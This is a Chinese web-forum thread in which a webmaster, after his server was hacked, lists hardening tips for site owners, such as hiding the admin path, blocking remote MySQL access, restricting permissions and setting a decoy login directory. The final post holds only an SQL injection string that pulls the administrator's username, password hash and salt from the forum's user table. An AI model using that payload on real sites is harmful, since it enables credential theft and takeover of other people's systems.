源码论坛公告:本站是一个交流学习建站资源的社区论坛,旨在交流学习源码脚本等资源技术,欢迎大家投稿发言! 【点击此处将锦尚放在桌面

源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

 找回密码
 会员注册

QQ登录

只需一步,快速开始

查看: 1217|回复: 2
打印 上一主题 下一主题

给大家提醒一下,包括admin.各位站长一定要注意[首肯网络]

[复制链接]

9

主题

158

帖子

12

金币

初级会员

Rank: 1

积分
334
跳转到指定楼层
1#
发表于 2011-7-20 12:49:28 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本人服务器今日早上被老外 hack,入侵,看见N个提权文件。

各位站长养成好的习惯。

1.

1天一个后台路径,2天Mysql数据库备份 ,3天web备份。5天3389端口更换。

2.

Mysql数据库IP限制最好是不要有远程Mysql 运行访问, ( 虚拟用户 )

独立服务器用户,坚决不要有Mysql远程访问

3.

整站备份时名字为,垃圾或者imges来重命名。最好RAR加密(保存近期完整,纯洁的整站包)

4.重点


一定要注意后台路径一定要改成,没有login.admin......等字节,也不要用自己域名地址。最好使用新的。
我的后台路径  kao /iadmin

5.权限限制。

如果你的网站是asp.的,你就限制PHP。php网站你就限制asp.   .net 的,全部限制
只给后台777权限。 剩下的除了da目录,都别给权限。

6.空闲的时候,经常进入服务器看看,一个目录一个目录的进行查看。  定期进行整站搜索,如果是PHP网站 你就搜索*.asp


7.给一个后台假目录

一般黑客都喜欢扫后台路径. 你就坐一个假目录 admin/admin_login。  里面的装潢自定
就让黑客去扫吧,呵呵。

我就说这么多了,看锦尚中国,每天慢慢的成长,我作为一个菜鸟技术,

最后支持 乞丐,论坛。


我很看重你哦、 首肯网络技术,Roman,k


分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享

26

主题

1029

帖子

176

金币

初级会员

Rank: 1

积分
2164
2#
发表于 2011-8-5 09:43:17 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
不错···

9

主题

158

帖子

12

金币

初级会员

Rank: 1

积分
334
3#
 楼主| 发表于 2012-4-10 11:46:07 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='
您需要登录后才可以回帖 登录 | 会员注册

本版积分规则

锦尚中国源码论坛

聚合标签|锦尚中国,为中国网站设计添动力 ( 鲁ICP备09033200号 ) |网站地图

GMT+8, 2024-11-27 18:04 , Processed in 0.115196 second(s), 25 queries .

带宽由 锦尚数据 提供 专业的数据中心

© 锦尚中国源码论坛 52jscn Inc. 非法入侵必将受到法律制裁 法律顾问:IT法律网 & 褚福省律师 锦尚爱心 版权申诉 版权与免责声明